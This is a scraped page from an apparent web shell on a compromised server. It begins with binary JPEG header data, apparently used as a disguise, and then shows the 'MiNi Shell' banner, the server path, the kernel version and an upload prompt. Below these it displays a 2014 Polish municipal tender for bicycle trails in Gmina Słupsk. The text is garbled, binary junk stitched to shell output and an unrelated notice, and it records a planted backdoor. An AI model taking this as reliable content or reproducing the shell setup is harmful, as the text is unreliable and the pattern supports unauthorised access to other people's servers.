JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140528/114667-N-2014.html

<p class="kh_header"><b>Słupsk: Budowę szlaków rowerowych w m. Bruskowo Małe i Bruskowo Wielkie - Strzelino wraz z oznakowaniem szlaków w terenie Gmina Słupsk</b><br>
<b>Numer ogłoszenia: 114667 - 2014; data zamieszczenia: 28.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Słupsk , ul. Sportowa 34, 76-200 Słupsk, woj. pomorskie, tel. 0-59 842 84 60, 842 92 54, faks 059 8429254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slupsk.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowę szlaków rowerowych w m. Bruskowo Małe i Bruskowo Wielkie - Strzelino wraz z oznakowaniem szlaków w terenie Gmina Słupsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przewiduje się budowę szlaków rowerowych na dz. 28, 214 i 149 w m. Bruskowo Małe , szlaku rowerowego na odcinku Bruskowo Wielkie dz. nr 248 - Strzelino dz. nr 37 wraz z oznakowaniem szlaków na terenie Gminy Słupsk

Zakres prac obejmujący zadanie

1 Budowa szlaku rowerowego na dz. nr 28 w Bruskowie Małym
	roboty pomiarowe przy liniowych robotach ziemnych - 0,350 km
	roboty ziemne w gruncie kat. III wraz z transportem urobku na odległość 
do 2 km - 639,00 m3
	profilowanie i zagęszczenie mechaniczne podłoża pod warstwy konstrukcyjne - 1.400,00 m2
	warstwa odsączająca z piasku gr. 10 cm po zagęszczeniu - 1.400,00 m2
	podbudowa z kruszywa łamanego 0/31,5 mm gr. 20 cm - 1.400,00 m2
	skropienie nawierzchni emulsją asfaltową w ilości 0,5 kg/m2 - 1.400,00 m2
	nawierzchnia z mieszanek mineralno - bitumicznych z warstwą wiążącą asfaltową 0/16 dla KR1 gr. 4 cm - 1.400,00 m2
	oczyszczenie i skropienie nawierzchni emulsją asfaltową w ilości 0,3 kg/m2 - 1.400,00 m2
	nawierzchnia z mieszanek mineralno - bitumicznych z warstwą ścieralną asfaltową 0/12,8 dla KR1 gr. 4 cm - 1.400,00 m2
	utwardzenie pobocza z kruszywa łamanego 0/31,5 mm gr. 15 cm - 525 m2

2 Budowa i oznakowanie szlaku USB między miejscowościami Bruskowo Wielkie                           dz. nr 248 i Strzelino dz. nr 37

a odcinek 450 mb drogi betonowej z betonu B-25 szer. 3,0 m
	koryta gł. 20 cm wykonywane mechanicznie - 1.395,00 m2	warstwa górna podbudowy o grubości po zagęszczeniu 8 cm z kruszywa naturalnego z domieszką ulepszającą z cementu 3% - 1.395,00 m2
	nawierzchnia z betonu B25 gr. 15 cm - 1.350,00 m2
	wykonanie poboczy szer. 0,5 m z materiału uzyskanego z korytowania - 450,00 m2

b odcinek 750 mb drogi tłuczniowej szer. 4,0 m
	koryta gł. 30 cm wykonywane mechanicznie - 3.075,00 m2
	warstwa odsączająca z piasku gr. 10 cm po zagęszczeniu - 3.000,00 m2
	podbudowa z kruszywa łamanego 0/31,5 mm gr. 20 cm - 1.400,00 m2



c odcinek 1100mb wyrównania kruszywem
	profilowanie i zagęszczenie mechaniczne podłoża pod warstwy konstrukcyjne - 4.400,00 m2
	podbudowa z kruszywa łamanego 0/31,5 mm gr. 7 cm - 4.400,00 m2

d oznakowanie szlaku
	słupki i znaki zakazu B-3 - 2 szt.
	słupki blokujące wjazd - 2 szt.

3 Budowa szlaku rowerowego w m. Bruskowo Małe na dz. nr 214
	roboty pomiarowe przy liniowych robotach ziemnych - 0,30 km
	roboty ziemne w gruncie kat. III wraz z transportem urobku na odległość 
do 2 km - 479,00 m3
	profilowanie i zagęszczenie mechaniczne podłoża pod warstwy konstrukcyjne - 1.622,50 m2
	ułożenie geowłókniny -1.180,00 m2
	warstwa odsączająca z piasku gr. 15 cm po zagęszczeniu - 1.180,00 m2
	podbudowa z kruszywa łamanego 0/31,5 mm gr. 20 cm - 1.180,00 m2
	utwardzenie pobocza z kruszywa łamanego 0/31,5 mm gr. 15 cm - 442,5 m2

4 Oznakowanie ścieżek i szlaków rowerowych na terenie Gminy Słupsk
	stojaki rowerowe Palepa - szt. 4
	słupki blokujące wjazd - wyjmowane 3x3 szt - 9 szt.
	słupki z rur stalowych - 40 szt
	pionowe drogowskazy jednoramienne - tabliczka znaku R-4 - 10 szt.
	pionowe drogowskazy jednoramienne - tabliczka znaku R-4b - 1 szt.
	pionowe drogowskazy jednoramienne - tabliczka znaku R-4d - 1 szt.
	pionowe znaki drogowe - znaki zakazu, nakazu ostrzegawcze i informacyjne - oznakowanie pod tabliczką zgodnie z rys. 8.2.6 rozporządzenia - 2 szt.
	pionowe znaki drogowe - drogowskazy jednoramienne - 8 szt.
	pionowe znaki drogowe - drogowskazy jednoramienne znaki E-9, E-12a, E-22a - 4 szt.
	pionowe znaki drogowe - tablice E-17a szt. 4, E-18a szt.4 - 8 szt.
	pionowe znaki drogowe - tablice Kraina w Kratę umieszczone pod miejscowością E-17a - 4 szt.
	pionowe znaki drogowe - tablice przy drogowskazach dwustronne z poglądową mapą = znak Kraina w Kratę  - 4 szt.
	tablica informacyjna leżąca z mapą laminowaną lub blachą pokryta - 2 szt.
	tablica informacyjna TYP B - szt. 3
	oznakowanie kamienne - 8 szt.
	Oznakowanie kamienne łamane - 3 szt.
	oznakowanie poziome - 67,5 m2
	ręczne malowanie oznakowania szlaków rowerowych - 9 m2

               5)  Budowa szlaku rowerowego na dz. nr 28, 49 i 214  w Bruskowie Małym
-      roboty pomiarowe przy liniowych robotach ziemnych - 0,650 km
       -      mechaniczne karczowanie zagajników średniej gęstości - 0,1 ha
	koryta gł. 30 -40 cm III wraz z transportem urobku na odległość do 4 km - 1.954,00 m2 m3
	profilowanie i zagęszczenie mechaniczne podłoża pod warstwy konstrukcyjne - 1.954,00 m2
	podbudowa z gruntu stabilizowanego cementem w ilości 25 kg/m2 gr. 15 cm - 1.954,00 m2
	podbudowa z kruszywa łamanego 0/31,5 mm gr. 15 cm - 1.527,00 m2
	podbudowa z kruszywa łamanego 0/31,5 mm gr. 20 cm - 727,00 m2
	oczyszczenie i skropienie nawierzchni emulsją asfaltową - 1.747,00 m2
	nawierzchnia z mieszanek mineralno - bitumicznych z warstwą wiążącą asfaltową gr. 4 cm - 220,00 m2
	nawierzchnia z mieszanek mineralno - bitumicznych z warstwą ścieralną asfaltową gr. 4 cm - 1.747,00 m2
	zjazdy z kostki betonowej gr.  8 cm - 207 m2
	obrzeża betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej - 1.134,00 m
	krawężniki betonowe wystające 15x30 cm na ławie betonowej - 423 m
	plantowanie skarp i dna rowów - 468 m2
	kanały z rur PP dwuwarstowych o śr. zewn. 400 mm - 99 m
	kanały z rur PP dwuwarstwowych łączonych na wcisk o śr. zewn. 500 mm - 18 m
	zabruk z kostki nieregularnej 10-16 cm wlotów i wylotów przepustów - 40 m2
	wykonanie ścianek czołowych dla rur o śr. 40 cm - 1 ścianka
	studnie rewizyjne z kręgów betonowych i żelbetowych o śr. 1200 mm gł. 3 m - 1 studnia
	rozścielenie ziemi urodzajnej - 144 m3
	humusowanie skarp z obsianiem  gr. humusu 5 cm - 1.440,00 m2
	pobocza z kruszywa kamiennego mm gr. 15 cm - 528 m2

	Przedmiot zamówienia obejmuje również opracowanie dokumentacji odbiorowej określonej w § 9 ust. 2 wzoru umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:         10 000,00 zł (słownie: dziesięć tys. zł.00/100).
	Wadium może być wniesione w jednej lub kilku następujących formach:
1	pieniądzu,
2	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem bankowym,
3	gwarancjach bankowych,
4	gwarancjach ubezpieczeniowych,
5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DZ.U. z 2000 r. Nr 109, poz. 1158 z póź. zm.).
	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Ustce, nr 77 9315 0004 0050 3934 2000 0020. Do oferty należy dołączyć dokument potwierdzający dokonanie przelewu.
	Wadium wnoszone w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy dołączyć w formie oryginału do oferty.
	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wadium wniesione w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 13.11 SIWZ.
	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zmówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 13.6 SIWZ jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku - Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia - warunek ten zostanie spełniony, jeżeli:

 Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwie roboty (odrębne umowy lub zlecenia) budowlane w branży drogowej polegającej na:
	min. 2 roboty drogowe polegające na układaniu nawierzchni z kruszywa łamanego o powierzchni nie mniejszej niż 4.000,00 m2 każda,
	min. 2 roboty drogowe polegające na układaniu nawierzchni z mieszanek mineralno - bitumicznych powierzchni nie mniejszej niż 2.000,00 m2 każda,
	min. 1 robota drogowa polegająca na układaniu nawierzchni z betonu B-25 o powierzchni nie mniejszej niż 800 m2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku - Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca zapewni przy realizacji zamówienia udział następujących osób:

osoby pełniącej funkcję kierownika budowy, posiadającej uprawnienia budowlane do kierowania robotami w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku - Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>min. 2 roboty drogowe polegające na układaniu nawierzchni z kruszywa łamanego o powierzchni nie mniejszej niż 4.000,00 m2 każda,
	min. 2 roboty drogowe polegające na układaniu nawierzchni z mieszanek mineralno - bitumicznych powierzchni nie mniejszej niż 2.000,00 m2 każda,
	min. 1 robota drogowa polegająca na układaniu nawierzchni z betonu B-25 o powierzchni nie mniejszej niż 800 m2;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie:
	Zmiany terminu realizacji zamówienia na skutek:
a	zaistnienia siły wyższej,
b	przedłużających się procedur związanych z wykorzystaniem przez Wykonawców środków ochrony prawnej w zamówieniach publicznych lub innych procedur zamówień publicznych,
c	wydania decyzji, postanowień lub innych aktów administracyjnych a także ich zmiany  mających wpływ na wykonanie przedmiotu umowy,
d	wystąpienia okoliczności powodujących konieczność przeprowadzenia prac saperskich, archeologicznych lub innych przeszkód uniemożliwiających lub utrudniających prowadzenie robót, ujawnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych instalacji,
e	konieczności dokonania zmian w dokumentacji projektowej bądź realizacji robót dodatkowych lub zamiennych podyktowanych m.in. zwiększeniem bezpieczeństwa wykonywanych robót, zapobieżeniem powstania strat dla Zamawiającego, uzyskaniem założonego lub lepszego efektu użytkowego, wystąpieniem wad ukrytych w dokumentacji projektowej ujawnionych podczas realizacji robót, koniecznością wykonania robót związanych z likwidacją szkód powstałych w wyniku zdarzenia losowego, których celem jest przywrócenie do stanu sprzed powstania szkody,
f	przestojów lub opóźnień spowodowanych przez Zamawiającego,
g	opóźnienia w przekazaniu placu budowy z winy Zamawiającego, jeżeli opóźnienie to będzie miało wpływ na termin zakończenia inwestycji,
h	zmian przedmiotu zamówienia wynikającego z inicjatywy Zamawiającego lub okoliczności które uniemożliwiają należytego wykonanie przedmiotu umowy,
i	zawieszenia i wstrzymania robót,
j	zmianę terminu rozpoczęcia robót w sytuacjach uzasadnionych leżących po stronie Zamawiającego związanych z koniecznością przestrzegania terminów i warunków uzyskania dofinansowania zewnętrznego na realizację danego projektu zgłoszonego do dofinansowania.

	Zmiany ryczałtowej ceny brutto realizacji robót budowlanych:
a	na skutek zmiany obowiązującego podatku od towarów i usług VAT, o ile okoliczności te powodują  konieczność zmiany ceny wg obowiązujących stawek podatku VAT, 
b	w przypadku zmian technologicznych korzystnych dla Zamawiającego lub zastosowania przez Wykonawcę preferencji cenowych,
c	w razie zaistnienia istotnej zmiany okoliczności powodującej ze wykonanie części zamówienia nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, a także w przypadku rezygnacji przez Zamawiającego z części robót. Zamawiający zastrzega sobie prawo do odliczenia z wynagrodzenia umownego wartości robót niewykonanych, a ujętych w cenie ofercie Wykonawcy.
	Wynikającym z potrzeby wprowadzenia innych rozwiązań technologicznych usprawniających wykonanie zamówienia ze względów technicznych lub finansowych z zastrzeżeniem, że zmiany nie mają istotnego wpływu na pierwotne warunki udziału w postępowaniu oraz na pierwotny przedmiot zamówienia określony w SIWZ. 
	Zmian wynikających ze zmian przepisów prawa, niezależnych od stron.
	Zmian z zakresu robót powierzonego podwykonawcom.
	Zmian osób wskazanych przez Wykonawcę do pełnienia funkcji, o których mowa w pkt. 7.1.3 SIWZ i uzyskać pozytywną akceptację Zamawiającego.
W zakresie zmiany wynagrodzenia dotyczącego robót zamiennych Zamawiający dopuszcza taką możliwość jeżeli wartość tych robót nie przekroczy ceny ryczałtowej zaoferowanej przez Wykonawcę i ujętej w umowie. W przypadku potrzeby zrealizowania robót zamiennych znacznie przekraczających po zmianach cenę  zamówienia Zamawiający ograniczy pierwotny zakres prac podlegający zmianom wraz ze zmniejszeniem wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminaslupsk.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - Urząd Gminy Słupsk, ul. Sportowa 34, 76-200 Słupsk, pok. nr 2.</p>
